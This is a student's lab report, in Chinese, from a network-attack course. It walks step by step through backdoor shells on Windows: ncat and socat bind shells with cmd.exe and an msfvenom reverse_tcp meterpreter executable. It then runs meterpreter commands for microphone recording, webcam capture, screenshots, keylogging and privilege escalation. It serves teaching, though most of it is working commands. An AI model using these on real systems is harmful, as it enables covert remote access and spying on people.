zoukankan      html  css  js  c++  java

  • Exp2 后门原理与实践

    20155332《网络对抗》Exp2 后门原理与实践

    1.实验环境

    • 主机一台联想台式机,安装有win10系统 。
    • 安装的kali虚拟机为攻击机。
    • 我的win10系统作为靶机。(建议再安装一个虚拟机作为靶机,不要像我这么做。我电脑有点卡,就没有安装那么多虚拟机了)
    • win10系统里,需要安装好ncat工具和socat工具,下载地址见老师的码云。
    • win10的IP是172.16.2.29,kali虚拟机的IP是192.168.114.129.

    2.实验内容 (3.5分)

    • (1)使用netcat获取主机操作Shell,cron启动 (0.5分)
    • (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)
    • (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
    • (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
    • (5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

    3.实验步骤

    3.1使用netcat获取主机操作Shell,cron启动

    1.在win10的cmd里,进入D: cat cat,输入ncat -l -e cmd.exe -p 53

    2.在kali的终端里,输入nc 172.16.2.29 53连接win10,获得shell权限

    3.2使用socat获取主机操作Shell, 任务计划启动

    1.在win10靶机中点击控制面板->系统和安全->管理工具->任务计划程序,话不多说,上图。

    在操作选项卡中绑定socat程序,给出参数 tcp-listen:5332exec:cmd.exe,pty,stderr

    右键5332进程,然后启动就行。

    2.在kali虚拟机中,socat - tcp:172.16.2.29:5332
    ,就可以获得win10的shell权限了

    3.3使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    1.在kali虚拟机中用Meterpreter生成后门。
    输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.2.29 LPORT=5332 -f exe > backdoor.exe

    2.把这个后门用ncat传送到靶机上。
    kali:ncat -l 5332 < backdoor.exe
    nc 172.16.2.29 > backdoor.exe

    3.开启后门

    • 在kali虚拟机终端输入 msfconsole

    • 接着输入 use exploit/multi/handler
    • 输入set payload windows/meterpreter/reverse_tcp

    • set LHOST 172.16.2.29
    • set LPORT 5332
    • show options
    • exploit

    4.开始窃取个人隐私

    • 输入shell,获得windows 命令行

    3.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    • 输入record_mic获取音频

    • webcam_snap打开摄像头

    • screenshot截屏

    • keyscan_start开始键盘记录
    • keyscan_dump导出键盘记录

    5.尝试提权
    输入getsystem提权,但是失败了。

    4.基础问题回答

    • (1)例举你能想到的一个后门进入到你系统中的可能方式?

    答:太多了。作为《机要风云》的演员之一,我饰演的机要员小刘的电脑就被黑客植入过后门。

    捆绑软件可以把后门和应用软件捆绑在一起,让我下载,进入我的系统。

    浏览网页的时候,一些弹窗会自动下载恶意软件。

    用一些破解软件,比如我的office就是用小马KMS激活的,可能就在电脑留下了后门。

    有人趁我不注意用U盘拷到我的电脑里。

    • (2)例举你知道的后门如何启动起来(win及linux)的方式?

    伪装成正规软件,双击就可以启动。

    或者设置为开机自启动。

    • (3)Meterpreter有哪些给你映像深刻的功能?

    可以打开电脑的摄像头,可以直播。去年参加微视演绎的时候,学姐给我电脑里植入的后门,打开了我的摄像头,我感到震惊。毕竟自己笔记本电脑的摄像头从来没用过,然后就被别人控制了,太可怕了。现在我终于知道了这个其实并不难。

    • (4)如何发现自己有系统有没有被安装后门?

    用windows defender对电脑进行实时防护。

    做实验的时候我只有把他关了才能运行这个后门程序。一打开Windows defender就会提醒电脑有恶意病毒,然后就把它删了。

    所以,自带的杀毒软件还是不错的。
  • 相关阅读:
    解决pip3的ImportError: cannot import name 'main'
    linux 安装Python3.6
    Linux安装redis和部署
    redis密码管理
    CentOS7使用firewalld打开关闭防火墙与端口
    scrapy 从Windwos平台移植到 Linux平台之实操
    Linux 环境下安装Maven
    解决:安装Jenkins时web界面出现该jenkins实例似乎已离线
    持续集成工具Jenkins结合SVN的安装和使用
    Linux下的SVN服务器搭建
  • 原文地址:https://www.cnblogs.com/besti2015/p/8664303.html
Copyright © 2011-2022 走看看